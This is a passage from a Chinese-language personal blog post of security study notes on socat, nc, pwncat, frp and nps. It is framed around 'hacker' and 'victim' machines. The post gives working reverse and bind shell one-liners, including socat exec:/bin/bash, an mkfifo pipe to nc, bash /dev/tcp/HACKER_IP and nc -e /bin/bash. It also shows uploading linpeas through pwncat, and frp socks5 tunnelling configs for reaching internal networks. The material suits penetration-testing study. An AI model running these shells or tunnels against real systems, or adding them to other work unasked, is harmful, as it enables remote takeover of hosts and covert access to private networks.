<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat openssl:192.168.2.84:1234,verify&#x3D;0 exec:&#x2F;bin&#x2F;bash,stderr</span><br></pre></td></tr></table></figure>

<h4 id="socat和nc一起用"><a href="#socat和nc一起用" class="headerlink" title="socat和nc一起用"></a>socat和nc一起用</h4><p>socat 监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp-listen:1234 -</span><br></pre></td></tr></table></figure>

<p>用nc反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm &#x2F;tmp&#x2F;f;mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f|&#x2F;bin&#x2F;sh -i 2&gt;&amp;1|nc 192.168.2.84 1234 &gt;&#x2F;tmp&#x2F;f</span><br></pre></td></tr></table></figure>

<p>是可以用的。。</p>
<p>socat正向shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP-LISTEN:1234 EXEC:&#x2F;bin&#x2F;bash,stderr</span><br></pre></td></tr></table></figure>

<p>Nc 去连接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nv 192.168.2.84 1234</span><br></pre></td></tr></table></figure>

<p>这样也是可以的</p>
<h4 id="本节参考链接"><a href="#本节参考链接" class="headerlink" title="本节参考链接"></a>本节参考链接</h4><ul>
<li><p><a href="https://www.cnblogs.com/LittleHann/p/12038070.html#_lab2_3_3" target="_blank" rel="noopener">反弹shell研究</a></p>
</li>
<li><p><a href="https://www.hi-linux.com/posts/61543.html" target="_blank" rel="noopener">socat入门教程</a></p>
</li>
</ul>
<h3 id="pwncat"><a href="#pwncat" class="headerlink" title="pwncat"></a>pwncat</h3><p>更加强的netcat。</p>
<h4 id="反向shell"><a href="#反向shell" class="headerlink" title="反向shell"></a>反向shell</h4><p>hacker执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwncat -l -p 1234</span><br><span class="line"># 和指定ip端口绑定</span><br><span class="line">pwncat -l 192.168.1.2:4444</span><br><span class="line"># 绑定任意地址的端口</span><br><span class="line">pwncat -l :4444</span><br><span class="line">默认就是任意地址的</span><br></pre></td></tr></table></figure>
<p>victim执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -c &#39;bash - i&gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;HACKER_IP&#x2F;1234 0&gt;&amp;1&#39;</span><br></pre></td></tr></table></figure>
<p><img src="https://images.atsud0.me/images/post/20210325-22:32:43-_4DwS8R_er9XYY.jpg" alt="20210325-22:32:43-_4DwS8R_er9XYY"></p>
<p>连nc魔术升级都省了。。。</p>
<h4 id="正向shell"><a href="#正向shell" class="headerlink" title="正向shell"></a>正向shell</h4><p>victim执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 3444 -e &#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></figure>

<p>hacker执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pwncat 127.0.0.1 3444</span><br><span class="line"># 或者</span><br><span class="line">pwncat connect:&#x2F;&#x2F;127.0.0.1:3444</span><br><span class="line"># 这样也行</span><br><span class="line">pwncat 127.0.0.1:3444</span><br></pre></td></tr></table></figure>
<p><img src="https://images.atsud0.me/images/post/20210325-23:06:25-_2MlS8T_o5gws4.png" alt="20210325-23:06:25-_2MlS8T_o5gws4"></p>
<h4 id="ssh连接"><a href="#ssh连接" class="headerlink" title="ssh连接"></a>ssh连接</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pwncat -i id_rsa.key  ssh:&#x2F;&#x2F;root@192.168.179.1</span><br><span class="line"></span><br><span class="line">pwncat root@192.168.179.1</span><br><span class="line"></span><br><span class="line">pwncat ssh:&#x2F;&#x2F;root:password@192.168.179.1</span><br></pre></td></tr></table></figure>

<p><img src="https://images.atsud0.me/images/post/20210325-23:08:16-_P0WFbb_XWYPeZ.png" alt="20210325-23:08:16-_P0WFbb_XWYPeZ"></p>
<p>不仅如此不仅如此，这居然内置了一些功能，比如下载，上传之类的。</p>
<h4 id="下载文件"><a href="#下载文件" class="headerlink" title="下载文件"></a>下载文件</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">(remote) pwncat$ Ctrl+D</span><br><span class="line"># 之后应该回回到(local)pwncat</span><br><span class="line"></span><br><span class="line">(local) download &#x2F;tmp&#x2F;a.txt &#x2F;tmp&#x2F;test-file</span><br><span class="line"># 不指定的话就是下载到当前目录</span><br></pre></td></tr></table></figure>

<h4 id="上传文件"><a href="#上传文件" class="headerlink" title="上传文件"></a>上传文件</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">(remote) pwncat$ Ctrl+D</span><br><span class="line"># 之后应该回回到(local)pwncat</span><br><span class="line">(local) upload &#x2F;tmp&#x2F;enum&#x2F;linpeas.sh &#x2F;tmp&#x2F;a.sh</span><br><span class="line"></span><br><span class="line"># 上传本地的linpeas.sh到目标机器的&#x2F;tmp&#x2F;下</span><br></pre></td></tr></table></figure>

<h4 id="获取系统信息"><a href="#获取系统信息" class="headerlink" title="获取系统信息"></a>获取系统信息</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(remote) pwncat$ Ctrl+D</span><br><span class="line"># 之后应该回回到(local)pwncat</span><br><span class="line">(local) sysinfo</span><br><span class="line">Host ID: &quot;一段hash(因为我是用自己云主机测试的，so。。)&quot;</span><br><span class="line">Remote Address: (&#39;192.168.179.1&#39;, 22)</span><br><span class="line">Architecture: x86_64</span><br><span class="line">Kernel Version: 4.19.0-14-cloud-amd64</span><br><span class="line">Distribution: debian</span><br><span class="line">Init System: Init.SYSTEMD</span><br></pre></td></tr></table></figure>



<ul>
<li><a href="https://www.youtube.com/watch?v=CISzI9klRkw" target="_blank" rel="noopener">Pwncat-Youtube早期版本演示</a></li>
<li><a href="https://github.com/calebstewart/pwncat" target="_blank" rel="noopener">Pwncat</a></li>
</ul>
<h3 id="frp"><a href="#frp" class="headerlink" title="frp"></a>frp</h3><p>项目地址:<a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">frp</a></p>
<h4 id="配置文件"><a href="#配置文件" class="headerlink" title="配置文件"></a>配置文件</h4><p>服务端：frps，服务端配置修改frps.ini这个文件。完整配置:<a href="https://github.com/fatedier/frp/blob/dev/conf/frps_full.ini" target="_blank" rel="noopener">frps_full.ini</a></p>
<p>客户端：frpc，客户端配置修改frpc.ini这个文件。完整配置:<a href="https://github.com/fatedier/frp/blob/dev/conf/frpc_full.ini" target="_blank" rel="noopener">frpc_full.ini</a></p>
<h4 id="映射tcp服务"><a href="#映射tcp服务" class="headerlink" title="映射tcp服务"></a>映射tcp服务</h4><h5 id="服务端配置"><a href="#服务端配置" class="headerlink" title="服务端配置"></a>服务端配置</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">bind_port &#x3D; 7000</span><br><span class="line">#bind_port用于客户端和服务端连接的端口，在配置客户端的时候会用到</span><br><span class="line">dashboard_port &#x3D; 10443</span><br><span class="line">#dashboard_port服务端控制台端口</span><br><span class="line">token &#x3D; Iamtheboneofmysword</span><br><span class="line">#token 身份标识，用于校验客户端和服务端的验证口令</span><br><span class="line">dashboard_user &#x3D; admin</span><br><span class="line">#服务端控制台用户名</span><br><span class="line">dashboard_pwd &#x3D; 123456</span><br><span class="line">#服务端控制台用户密码</span><br></pre></td></tr></table></figure>

<h5 id="客户端配置"><a href="#客户端配置" class="headerlink" title="客户端配置"></a>客户端配置</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr &#x3D; x.x.x.x</span><br><span class="line">server_port &#x3D; 7000 #对应服务端配置的bind_port</span><br><span class="line">token &#x3D; Iamtheboneofmysword</span><br><span class="line"></span><br><span class="line">[ssh]</span><br><span class="line">type &#x3D; tcp #类型</span><br><span class="line">local_ip &#x3D; 127.0.0.1 #本地ip</span><br><span class="line">local_port &#x3D; 22 #ssh服务的本地端口</span><br><span class="line">remote_port &#x3D; 10022 #服务端上开放的端口号</span><br></pre></td></tr></table></figure>

<h5 id="运行"><a href="#运行" class="headerlink" title="运行"></a>运行</h5><p>上诉配置写好之后，直接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#服务端</span><br><span class="line">.&#x2F;frps -c frps.ini </span><br><span class="line"># 如果想后台运行就用nohup或者是screen之类的，也可以写个服务来守护进程。</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#客户端</span><br><span class="line">.&#x2F;frpc -c frpc.ini</span><br></pre></td></tr></table></figure>

<p>之后ssh x.x.x.x:10022就可以访问到客户端的ssh服务了。</p>
<p>映射其他的服务也是一样的用法。</p>
<h4 id="配置socks5-proxy代理-实现内网穿透"><a href="#配置socks5-proxy代理-实现内网穿透" class="headerlink" title="配置socks5 proxy代理 实现内网穿透"></a>配置socks5 proxy代理 实现内网穿透</h4><p>服务端配置可以不动。</p>
<p>客户端简单修改下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr &#x3D; x.x.x.x</span><br><span class="line">server_port &#x3D; 7000</span><br><span class="line">token &#x3D; Iamtheboneofmysword</span><br><span class="line"></span><br><span class="line">[socks5]</span><br><span class="line">type &#x3D; tcp</span><br><span class="line">remote_port &#x3D; 8080</span><br><span class="line">plugin &#x3D; socks5</span><br><span class="line">plugin_user &#x3D; whoami #代理用户名</span><br><span class="line">plugin_passwd &#x3D; wwwwww #密码</span><br><span class="line">use_encryption &#x3D; true #是否使用加密</span><br><span class="line">use_compression &#x3D; true #是否使用压缩</span><br></pre></td></tr></table></figure>

<p>之后可以用socks5代理访问到客户端内网中的其他服务。</p>
<h4 id="添加自启"><a href="#添加自启" class="headerlink" title="添加自启"></a>添加自启</h4><p>官方项目下载之后的文件夹，有个systemd目录，已经帮你写好了服务了。</p>
<p>以frps为例</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cp systemd&#x2F;frps.service &#x2F;etc&#x2F;systemd&#x2F;system&#x2F;</span><br><span class="line">cp frps &#x2F;usr&#x2F;bin&#x2F;frps</span><br><span class="line">mkdir &#x2F;etc&#x2F;frp</span><br><span class="line">cp frps.ini &#x2F;etc&#x2F;frp&#x2F;</span><br><span class="line"></span><br><span class="line">sysstemctl start frps</span><br></pre></td></tr></table></figure>

<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://gofrp.org/docs/features/common/network/network/" target="_blank" rel="noopener">https://gofrp.org/docs/features/common/network/network/</a></p>
<p><a href="https://sspai.com/post/52523" target="_blank" rel="noopener">https://sspai.com/post/52523</a></p>
<p><a href="https://www.anquanke.com/post/id/184855#h3-4" target="_blank" rel="noopener">https://www.anquanke.com/post/id/184855#h3-4</a></p>
<h3 id="EarthWorm"><a href="#EarthWorm" class="headerlink" title="EarthWorm"></a>EarthWorm</h3><p>下载地址:<a href="https://github.com/idlefire/ew" target="_blank" rel="noopener">ew-github</a><br>介绍页面：<a href="http://rootkiter.com/EarthWorm/" target="_blank" rel="noopener">Earthworm</a></p>
<h3 id="nps"><a href="#nps" class="headerlink" title="nps"></a>nps</h3><p>下载:<a href="https://github.com/ehang-io/nps/releases/tag/v0.26.9" target="_blank" rel="noopener">nps</a></p>
<p>官方文档:<a href="https://ehang-io.github.io/nps" target="_blank" rel="noopener">ehang-to.github.io</a></p>
<h4 id="nps-service"><a href="#nps-service" class="headerlink" title="nps.service"></a>nps.service</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim &#x2F;etc&#x2F;systemd&#x2F;system&#x2F;nps.service</span><br></pre></td></tr></table></figure>
<p>添加以下内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">[Unit]</span><br><span class="line">Description&#x3D;Nps Server Service</span><br><span class="line">After&#x3D;network.target</span><br><span class="line">Wants&#x3D;network-online.target</span><br><span class="line"></span><br><span class="line">[Service]</span><br><span class="line">Type&#x3D;simple</span><br><span class="line">User&#x3D;nobody</span><br><span class="line">Restart&#x3D;on-failure</span><br><span class="line">RestartSec&#x3D;5s</span><br><span class="line">ExecStart&#x3D;&#x2F;opt&#x2F;nps&#x2F;nps</span><br><span class="line"></span><br><span class="line">[Install]</span><br><span class="line">WantedBy&#x3D;multi-user.target</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systemctl start nps #启动</span><br><span class="line">systemctl enable nps #开机自启动</span><br></pre></td></tr></table></figure>

<h3 id="chisel"><a href="#chisel" class="headerlink" title="chisel"></a>chisel</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>项目地址:<a href="https://github.com/jpillora/chisel" target="_blank" rel="noopener">chisel</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>atsud0
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://atsud0.me/2020/04/24/netcat-socat%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="nc,socat,frp笔记">http://atsud0.me/2020/04/24/netcat-socat学习笔记/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/nc/" rel="tag"><i class="fa fa-tag"></i> nc</a>
              <a href="/tags/ncat/" rel="tag"><i class="fa fa-tag"></i> ncat</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/04/24/TryHackMe-Ice/" rel="prev" title="TryHackMe-Ice">
      <i class="fa fa-chevron-left"></i> TryHackMe-Ice
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/04/24/%E7%AC%94%E8%AE%B0/" rel="next" title="笔记">
      笔记 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#nc"><span class="nav-number">1.</span> <span class="nav-text">nc</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#传输文本信息"><span class="nav-number">1.1.</span> <span class="nav-text">传输文本信息</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用nc进行收集信息"><span class="nav-number">1.2.</span> <span class="nav-text">利用nc进行收集信息</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#传输文件"><span class="nav-number">1.3.</span> <span class="nav-text">传输文件</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#加密传输文件"><span class="nav-number">1.3.1.</span> <span class="nav-text">加密传输文件</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#传输目录"><span class="nav-number">1.4.</span> <span class="nav-text">传输目录</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#加密传输目录"><span class="nav-number">1.4.1.</span> <span class="nav-text">加密传输目录</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#流媒体服务器"><span class="nav-number">1.5.</span> <span class="nav-text">流媒体服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#扫端口"><span class="nav-number">1.6.</span> <span class="nav-text">扫端口</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#远程控制"><span class="nav-number">1.7.</span> <span class="nav-text">远程控制</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#正向"><span class="nav-number">1.7.1.</span> <span class="nav-text">正向</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#反向"><span class="nav-number">1.7.2.</span> <span class="nav-text">反向</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#反弹shell"><span class="nav-number">1.8.</span> <span class="nav-text">反弹shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#python反弹"><span class="nav-number">1.9.</span> <span class="nav-text">python反弹</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ncat"><span class="nav-number">2.</span> <span class="nav-text">ncat</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#socat"><span class="nav-number">3.</span> <span class="nav-text">socat</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简易聊天窗口"><span class="nav-number">3.1.</span> <span class="nav-text">简易聊天窗口</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文件操作"><span class="nav-number">3.2.</span> <span class="nav-text">文件操作</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#传输文件-1"><span class="nav-number">3.2.1.</span> <span class="nav-text">传输文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#传递目录"><span class="nav-number">3.2.2.</span> <span class="nav-text">传递目录</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#读写分流"><span class="nav-number">3.2.3.</span> <span class="nav-text">读写分流</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#端口转发"><span class="nav-number">3.3.</span> <span class="nav-text">端口转发</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#shell"><span class="nav-number">3.4.</span> <span class="nav-text">shell</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#反向-1"><span class="nav-number">3.4.1.</span> <span class="nav-text">反向</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#正向-1"><span class="nav-number">3.4.2.</span> <span class="nav-text">正向</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SOCAT加密传输"><span class="nav-number">3.5.</span> <span class="nav-text">SOCAT加密传输</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#socat和nc一起用"><span class="nav-number">3.6.</span> <span class="nav-text">socat和nc一起用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#本节参考链接"><span class="nav-number">3.7.</span> <span class="nav-text">本节参考链接</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pwncat"><span class="nav-number">4.</span> <span class="nav-text">pwncat</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#反向shell"><span class="nav-number">4.1.</span> <span class="nav-text">反向shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#正向shell"><span class="nav-number">4.2.</span> <span class="nav-text">正向shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ssh连接"><span class="nav-number">4.3.</span> <span class="nav-text">ssh连接</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#下载文件"><span class="nav-number">4.4.</span> <span class="nav-text">下载文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#上传文件"><span class="nav-number">4.5.</span> <span class="nav-text">上传文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取系统信息"><span class="nav-number">4.6.</span> <span class="nav-text">获取系统信息</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#frp"><span class="nav-number">5.</span> <span class="nav-text">frp</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#配置文件"><span class="nav-number">5.1.</span> <span class="nav-text">配置文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#映射tcp服务"><span class="nav-number">5.2.</span> <span class="nav-text">映射tcp服务</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#服务端配置"><span class="nav-number">5.2.1.</span> <span class="nav-text">服务端配置</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#客户端配置"><span class="nav-number">5.2.2.</span> <span class="nav-text">客户端配置</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#运行"><span class="nav-number">5.2.3.</span> <span class="nav-text">运行</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#配置socks5-proxy代理-实现内网穿透"><span class="nav-number">5.3.</span> <span class="nav-text">配置socks5 proxy代理 实现内网穿透</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#添加自启"><span class="nav-number">5.4.</span> <span class="nav-text">添加自启</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考"><span class="nav-number">5.5.</span> <span class="nav-text">参考</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EarthWorm"><span class="nav-number">6.</span> <span class="nav-text">EarthWorm</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nps"><span class="nav-number">7.</span> <span class="nav-text">nps</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#nps-service"><span class="nav-number">7.1.</span> <span class="nav-text">nps.service</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#chisel"><span class="nav-number">8.</span> <span class="nav-text">chisel</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="atsud0"
      src="https://images.atsud0.me/images/atsud0-avator.jpg">
  <p class="site-author-name" itemprop="name">atsud0</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">150</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/index.html">
          
        <span class="site-state-item-count">191</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/atsud0" title="GitHub → https://github.com/atsud0" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:admin@atsud0.me" title="E-Mail → mailto:admin@atsud0.me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/atsud0" title="Twitter → https://twitter.com/atsud0" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://t.me/MindworkshopBot" title="Telegram → https://t.me/MindworkshopBot" rel="noopener" target="_blank"><i class="fab fa-telegram fa-fw"></i>Telegram</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.ajin.cloud/" title="https://blog.ajin.cloud/" rel="noopener" target="_blank">ajin</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://leiblog.wang/" title="https://leiblog.wang/" rel="noopener" target="_blank">LeiWang</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://esonhugh.github.io/" title="https://esonhugh.github.io/" rel="noopener" target="_blank">Esonhugh</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://isabellainori.github.io/" title="https://isabellainori.github.io/" rel="noopener" target="_blank">Isabella Ross</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">atsud0</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">Symbols count total: </span>
    <span title="Symbols count total">462k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">Reading time total &asymp;</span>
    <span title="Reading time total">7:01</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
